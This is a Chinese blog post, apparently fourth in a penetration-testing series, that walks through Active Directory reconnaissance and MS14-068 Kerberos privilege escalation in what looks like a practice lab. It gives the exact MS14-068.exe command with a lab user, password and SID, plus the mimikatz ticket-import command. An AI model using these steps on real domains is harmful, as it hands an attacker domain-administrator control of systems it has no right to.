走进森林深处(四)

robots

 

前言

此系列的第四篇文章,预计这个系列的文章应该会在十篇左右。周末再次加更,希望能带给读者好的阅读体验。

 

信息收集

查找域控IP对我们接下来的渗透尤为重要,MS14-068或zero等洞之前,都需要提供域控的IP等。
net group "domain controllers" /domain

此命令会获取域控主机的主机名,然后我们使用ping 命令获取域控主机IP

可以看见使用ping命令获取到的是ipv6的地址,所以我们需要使用ping -4

查看用户是否是域用户,当我们获取到 一台权限时,我们需要查看此权限是否为域用户。
net user 用户名 /domain

 

MS14-068

前文讲述了一些关于内网的常规手段,接下来会逐个介绍内网中常见了提权漏洞。在各种条件下使用漏洞提升至域管。

利用条件

MS14-068漏洞可将普通域用户权限提升为域管理员用户,利用条件:
1.未打补丁
2.有一个普通域用户
3.知道域用户的密码

工具下载地址

https://github.com/ianxtianxt/MS14-068

复现

查看当前权限用户是否为域用户

查看域控主机

获取域控主机IP

获取当前域用户SID

上传MS14-068工具

运行MS14-068工具

MS14-068.exe -u liukaifeng01@god.org -p hongrisec@2020 -s S-1-5-21-2952760202-1353902439-2381784089-1000 -d OWA.god.org
查看本地票据

清除本地票据

导入生成票据
mimikatz kerberos::ptc TGT_liukaifeng01@god.org.ccache
然后执行命令即可

 

总结

MS14-068需要一个普通域用户的权限进行域管提权,此文之后将会讲述通过所有提权漏洞造成的横向。明白每一个漏洞的使用方法以及使用前提和使用后的结果可以使我们在域内横向时便于使用组合拳。可以通过表达式记录此漏洞,有一天你我会发现事物的本质是如此重要……

(完)